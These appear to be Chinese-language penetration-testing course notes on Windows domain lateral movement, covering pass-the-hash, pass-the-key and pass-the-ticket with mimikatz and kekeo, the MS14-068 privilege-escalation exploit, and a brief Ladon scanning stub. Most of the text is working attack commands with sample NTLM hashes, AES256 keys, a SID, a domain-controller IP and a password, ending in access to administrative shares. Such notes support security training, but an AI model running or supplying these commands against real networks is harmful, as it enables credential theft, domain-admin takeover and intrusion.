PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试
PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试
PTK(pass the key) #利用的 ekeys aes256 进行的渗透测试
pth:没打补丁用户都可以连接,打了补丁只能 administrator 连接
ptk:打了补丁才能用户都可以连接,采用 aes256 连接
案例 1-域横向移动 PTH 传递-mimikatz
PTH ntlm 传递
未打补丁下的工作组及域连接:
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c
sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7
\\OWA2010CN-God.god.org
mimikatz查询出本机NTLM后,通过本机的NTLM值连接域内其它主机(如果设置的密码相同,即可连上) 执行后,弹出一个cmd窗口,可输入对应要连接主机的ip,连接并执行命令(可对内网存活主机的ip依次进行测试)
案例 2-域横向移动 PTK 传递-mimikatz
对方主机必须打了补丁,用户才可连接 通过mimikatz获取aes256值后,进行连接
PTK aes256 传递
打补丁后的工作组及域连接:
sekurlsa::ekeys #获取 aes
sekurlsa::pth /user:mary /domain:god
/aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b
案例 3-域横向移动 PTT 传递-ms14068&kekeo&本地
#PTT 攻击的部分就不是简单的 NTLM 认证了,它是利用 Kerberos 协议进行攻击的,这里就介绍三种
常见的攻击方法:MS14-068,Golden ticket,SILVER ticket,简单来说就是将连接合法的票据注入到
内存中实现连接。
MS14-068 基于漏洞,Golden ticket(黄金票据),SILVER ticket(白银票据)
其中 Golden ticket(黄金票据),SILVER ticket(白银票据)属于权限维持技术
MS14-068 造成的危害是允许域内任何一个普通用户,将自己提升至域管权限。微软给出的补丁是
kb3011780
第一种利用漏洞:
能实现普通用户直接获取域控 system 权限
#MS14-068 powershell 执行
1.查看当前 sid whoami/user
2.mimikatz # kerberos::purge
清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
mimikatz # kerberos::list 查看当前机器凭证
mimikatz # kerberos::ptc 票据文件 将票据注入到内存中
3.利用 ms14-068 生成 TGT 数据
ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -
p admin!@#45
4.票据注入内存
mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" exit
5.查看凭证列表 klist
6.利用
dir \\192.168.3.21\c$
当获取到并连接域中的一个普通用户时,获取本地sid值 MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45 通过MS14-068执行后会生成一个TGT开头的文件(票据) 通过mimikaze将生成的票据注入到内存中,可通过klist命令查看 查看域控制器名字,直接进行连接
第二种利用工具 kekeo
1.生成票据
kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c"
2.导入票据
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
3.查看凭证 klist
4.利用 net use 载入
dir \\192.168.3.21\c$
运行kekeo执行命令后生成一个kirbi后缀文件 导入生成的kirbi文件票据,导入后直接连接
第三种利用本地票据(需管理权限)
利用mimikatz导出以前建立连接过的票据
再把以前连接过的票据重新导入,去连接尝试
sekurlsa::tickets /export
kerberos::ptt xxxxxxxxxx.xxxx.kirbi
导出以前建立过连接的票据 将导出的票据重新导入,尝试连接
总结:ptt 传递不需本地管理员权限,连接时主机名连接,基于漏洞,工具,本地票据
案例 4-国产 Ladon 内网杀器测试验收
信息收集-协议扫描-漏洞探针-传递攻击等
扫描在线主机 检测网段中是否存在ms17010漏洞 扫描网段中是否开发445端口,可以进行smbscan的连接
连接192.168.3.21主机
|